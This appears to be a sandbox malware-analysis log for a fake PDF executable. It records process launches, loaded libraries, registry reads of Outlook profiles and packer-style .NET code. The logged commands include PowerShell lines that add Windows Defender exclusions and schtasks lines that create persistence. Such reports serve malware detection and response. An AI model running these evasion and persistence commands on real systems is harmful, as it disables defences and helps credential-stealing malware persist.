Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cQwRvD.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp9BD5.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	Process created: C:\Windows\SysWOW64\sdiagnhost.exe "C:\Windows\SysWOW64\sdiagnhost.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"

Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	Section loaded: rasadhlp.dll

Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\sdiagnhost.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source: Payment_Confirmation_pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Payment_Confirmation_pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mYtMtAAMpAtCOL.exe, 00000012.00000002.2559391595.0000000000FFE000.00000002.00000001.01000000.0000000E.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2549133517.0000000000FFE000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: RegSvcs.pdb, source: sdiagnhost.exe, 00000013.00000002.2566048825.0000000004DAC000.00000004.10000000.00040000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2549013869.0000000000907000.00000004.00000020.00020000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.00000000034BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.1959082934.000000002734C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000003.1655294935.00000000045D4000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000003.1652836303.0000000004424000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2564239904.000000000491E000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2564239904.0000000004780000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000003.1655294935.00000000045D4000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000003.1652836303.0000000004424000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2564239904.000000000491E000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2564239904.0000000004780000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: sdiagnhost.pdb source: RegSvcs.exe, 0000000A.00000002.1652980431.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000012.00000003.1847590518.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb source: sdiagnhost.exe, 00000013.00000002.2566048825.0000000004DAC000.00000004.10000000.00040000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2549013869.0000000000907000.00000004.00000020.00020000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.00000000034BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.1959082934.000000002734C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: sdiagnhost.pdbGCTL source: RegSvcs.exe, 0000000A.00000002.1652980431.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000012.00000003.1847590518.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.Payment_Confirmation_pdf.exe.4145828.1.raw.unpack, id.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.Payment_Confirmation_pdf.exe.5bc0000.4.raw.unpack, id.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, XZoroxKebvtGCIPa9b.cs	.Net Code: zcGMN63wFd System.Reflection.Assembly.Load(byte[])
Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, XZoroxKebvtGCIPa9b.cs	.Net Code: zcGMN63wFd System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Code function: 0_2_013BEFB0 push esp; iretd	0_2_013BEFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00403210 push eax; ret	10_2_00403212
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_004182DA pushad ; ret	10_2_004182DC
